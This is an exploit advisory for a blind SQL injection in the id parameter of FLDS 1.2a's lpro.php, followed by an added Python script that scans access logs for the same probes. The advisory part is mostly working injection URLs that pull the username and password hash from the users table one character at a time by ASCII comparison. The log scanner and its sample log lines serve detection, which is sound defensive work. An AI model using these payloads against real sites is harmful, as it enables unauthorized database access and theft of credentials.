#########################################################################################################################
[+] FLDS 1.2a lpro.php (id) Blind SQL Injection Vulnerability
[+] Discovered By SirGod
[+] Greetz : All my friends
#########################################################################################################################

[+] Blind SQL Injection

- Get username :

http://[target]/[path]/lpro.php?id=1 and ascii(substring((SELECT username from users limit 0,1),1,1))>96

Query is true (page loads normally). Going to the next ASCII char.

http://[target]/[path]/lpro.php?id=1 and ascii(substring((SELECT username from users limit 0,1),1,1))>97

Query is false, so the first char of the username is ascii(97), which is "a".

Then move to the next char of the username. Change the substring position 1,1 to 2,1

http://[target]/[path]/lpro.php?id=1 and ascii(substring((SELECT username from users limit 0,1),2,1))>99

Query is true (page loads normally). Going to the next ASCII char.

http://[target]/[path]/lpro.php?id=1 and ascii(substring((SELECT username from users limit 0,1),2,1))>100

Query is false, so the second char of the username is ascii(100), which is "d".

And so on ... change the substring position : 1,1 then 2,1 then 3,1 ...

Username is : admin (Example)

- Get password (hash) :

http://[target]/[path]/lpro.php?id=1 and ascii(substring((SELECT password from users limit 0,1),1,1))>49

Query is true (page loads normally). Going to the next ASCII char.

http://[target]/[path]/lpro.php?id=1 and ascii(substring((SELECT password from users limit 0,1),1,1))>50

Query is false, so the first char of the password hash is ascii(50), which is "2".

Then move to the next char of the password hash. Change the substring position 1,1 to 2,1

http://[target]/[path]/lpro.php?id=1 and ascii(substring((SELECT password from users limit 0,1),2,1))>48

Query is true (page loads normally). Going to the next ASCII char.

http://[target]/[path]/lpro.php?id=1 and ascii(substring((SELECT password from users limit 0,1),2,1))>49

Query is false, so the second char of the password hash is ascii(49), which is "1".

And so on ... change the substring position : 1,1 then 2,1 then 3,1 ...

Password hash is : 21232f297a57a5a743894a0e4a801fc3 (Example)

#########################################################################################################################
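
For the defender's side of the requests shown above, this added example (not part of the original advisory and not FLDS code) scans web-server access logs for the comparison probes sent to the id parameter of lpro.php. The log lines, client addresses, /flds/ path, combined log format and the function name find_blind_sqli are assumptions made for the example.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format, documentation IP ranges).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /flds/lpro.php?id=42 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:01 +0000] "GET /flds/lpro.php?id=1%20and%20ascii(substring((SELECT%20username%20from%20users%20limit%200,1),1,1))%3E96 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:02 +0000] "GET /flds/lpro.php?id=1%20and%20ascii(substring((SELECT%20username%20from%20users%20limit%200,1),1,1))%3E97 HTTP/1.1" 200 812',
    '203.0.113.9 - - [01/Jan/2024:10:00:03 +0000] "GET /flds/lpro.php?id=1%20and%20ascii(substring((SELECT%20username%20from%20users%20limit%200,1),2,1))%3E99 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:04 +0000] "GET /flds/lpro.php?id=1+AND+ASCII(SUBSTRING((select+password+from+users+limit+0,1),1,1))%3E49 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Jan/2024:10:00:05 +0000] "GET /flds/lpro.php?id=abc HTTP/1.1" 200 812',
]

REQ = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# ascii(substring((SELECT <col> FROM <table> ...),<pos>,<len>)) <cmp> <n>, any case or spacing
PROBE = re.compile(
    r'ascii\s*\(\s*(?:substring|substr|mid)\s*\(\s*\(\s*select\s+(\w+)\s+from\s+(\w+).*?\)'
    r'\s*,\s*(\d+)\s*,\s*\d+\s*\)\s*\)\s*[<>=]+\s*\d+', re.I)

def find_blind_sqli(lines, script="lpro.php", param="id"):
    """Per client: count of non-numeric ids, probe hits, targeted columns, deepest position."""
    report = defaultdict(lambda: {"probes": 0, "non_numeric": 0, "targets": set(), "max_pos": 0})
    for line in lines:
        m = REQ.match(line)
        if not m:
            continue
        ip, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/" + script):
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            if value.isdigit():
                continue  # a legitimate id is digits only; anything else is worth recording
            entry = report[ip]
            entry["non_numeric"] += 1
            hit = PROBE.search(value)  # parse_qs has already decoded %xx and '+'
            if hit:
                entry["probes"] += 1
                entry["targets"].add((hit.group(2).lower(), hit.group(1).lower()))
                entry["max_pos"] = max(entry["max_pos"], int(hit.group(3)))
    return dict(report)
```

The max_pos value gives a lower bound on how many characters of a column were tested, which helps scope which credentials to rotate after such requests are found.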